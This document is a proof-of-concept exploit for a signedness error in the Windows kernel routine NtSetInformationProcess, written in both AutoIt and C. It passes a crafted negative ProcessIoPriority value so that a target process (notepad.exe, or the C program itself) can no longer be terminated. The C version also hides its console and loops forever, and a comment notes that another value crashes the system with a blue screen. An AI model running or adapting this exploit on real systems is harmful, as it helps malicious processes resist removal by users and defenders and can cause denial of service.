Non killable process due to signedness error in nt!NtSetInformationProcess

nonkill.au3

sNonKillableProcess('notepad.exe')

Func sNonKillableProcess($sProcess)



Local $sProcessHandle , $sPid , $sAccess , $sSignedvalue , $ProcessIoPriority , $sProcessInformationLength , $sStruct

If Not @Compiled Then Exit

$sPid = ProcessExists($sProcess)

if Not $sPid Then Exit

$sAccess = 0x001F0FFF

$sProcessHandle  =  DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $sAccess, "bool", True, "dword", $sPid)

$sSignedvalue = 0x8000F129 ;0xFFFFFFFF (BSOD not work on Win7 x86 )

$ProcessIoPriority = 0x21

$sProcessInformationLength = 0x4

$sStruct = DLLStructCreate("Byte[4]")

DllStructSetData($sStruct, 1, $sSignedvalue)

$sRet = DllCall ("ntdll.dll" , "none" , "ZwSetInformationProcess" , "int" , $sProcessHandle[0]  , "int" , _
$ProcessIoPriority , "int" , DllStructGetPtr($sStruct) , "int" , $sProcessInformationLength)

EndFunc

nonkill.c

#include <Windows.h>
#include <stdio.h>
#define ProcessIoPriority               0x21

#define STATUS_INTERNAL_ERROR   0xC00000E5

#ifndef NTAPI
#define NTAPI STDAPI
#endif

typedef long  NTSTATUS;
// Thanks to hasherezade :)
int main() {
   
   FreeConsole();
   int i, j;  
    //init function ZwSetInformationProcess:
    NTSTATUS (NTAPI *ZwSetInformationProcess)(IN HANDLE hProcess, IN ULONG ProcessInfoClass, IN PVOID ProcessInfo, IN ULONG ProcessInfoLength);
    HMODULE hNTDLL;
    if(!(hNTDLL = GetModuleHandle("ntdll")))
        return STATUS_INTERNAL_ERROR;

    *(FARPROC *)&ZwSetInformationProcess = GetProcAddress(hNTDLL, "NtSetInformationProcess");
    
    if(!ZwSetInformationProcess)
        return STATUS_INTERNAL_ERROR;
        
    // use function ZwSetInformationProcess:

    unsigned long val = 0x8000F129;
    int ret = ZwSetInformationProcess(GetCurrentProcess(), ProcessIoPriority, &val, 0x4);
    if (ret < 0) printf("Error %x\r\n",ret);
    while (1)  {
    i = j++;
    Sleep(1000);
  }
    return 0;
}